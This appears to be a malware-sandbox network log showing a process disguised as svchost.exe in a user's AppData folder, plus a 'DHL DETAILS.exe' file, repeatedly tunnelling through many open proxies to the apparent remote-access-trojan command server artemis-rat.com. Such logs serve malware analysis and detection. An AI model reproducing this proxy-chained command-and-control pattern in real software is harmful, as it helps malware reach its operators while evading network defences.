Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2568	192.168.2.5	58458	23.137.248.197	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.834768057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.645680904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2569	192.168.2.5	58438	43.133.70.57	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.841171026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2570	192.168.2.5	58497	104.20.75.132	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.845272064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.999327898 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2571	192.168.2.5	58368	104.129.205.94	54321	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.846350908 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2572	192.168.2.5	57443	162.243.102.207	9764	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.850716114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.270574093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2573	192.168.2.5	58386	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.854383945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2574	192.168.2.5	58441	219.243.212.118	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.854773045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.181751013 CET	22	IN	HTTP/1.1 502 ERROR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2575	192.168.2.5	57464	159.65.245.255	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.856055975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.567519903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.380466938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.281560898 CET	442	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2576	192.168.2.5	58463	129.213.150.205	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.857831001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2577	192.168.2.5	57256	91.134.140.160	12217	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.857980967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.380196095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880784035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.815813065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548333883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.177493095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2578	192.168.2.5	58035	112.30.155.83	12792	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.859293938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333091974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.020523071 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2579	192.168.2.5	58454	13.229.47.109	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.860457897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.185817003 CET	223	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:12:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close Content-Length: 12 X-Kong-Response-Latency: 6.2942504882813e-05 Server: kong/2.8.1 Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a Data Ascii: Bad request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2580	192.168.2.5	57992	117.160.250.133	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.861066103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.612375975 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2581	192.168.2.5	57285	183.215.23.242	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.863964081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.275445938 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:48 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2582	192.168.2.5	57402	115.96.208.124	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.874562979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.305939913 CET	72	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2583	192.168.2.5	58437	49.228.131.169	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.876679897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2584	192.168.2.5	55516	189.240.60.171	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.885544062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.179922104 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2585	192.168.2.5	58456	203.171.19.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.907591105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2586	192.168.2.5	58499	52.54.249.241	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.908385038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.124623060 CET	66	IN	HTTP/1.1 400 BAD_REQUEST Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2587	192.168.2.5	58462	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.948052883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2588	192.168.2.5	57453	86.107.178.102	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.948151112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677242041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2589	192.168.2.5	58448	65.1.244.232	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.948152065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.342329979 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2590	192.168.2.5	58555	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.949721098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2591	192.168.2.5	58459	103.146.137.5	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.951790094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2592	192.168.2.5	58464	46.35.9.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.952003002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2593	192.168.2.5	58529	3.12.144.146	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.954788923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.171610117 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:31 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2594	192.168.2.5	55659	104.236.0.129	22167	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.972680092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974193096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.995661974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2595	192.168.2.5	58600	104.16.106.234	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.983714104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.138667107 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2596	192.168.2.5	57316	104.248.158.78	47225	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.994642973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.333204031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2597	192.168.2.5	58440	146.190.85.79	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.998842955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.480302095 CET	1286	IN	HTTP/1.1 503 Service Unavailable Server: squid/4.6 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3773 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 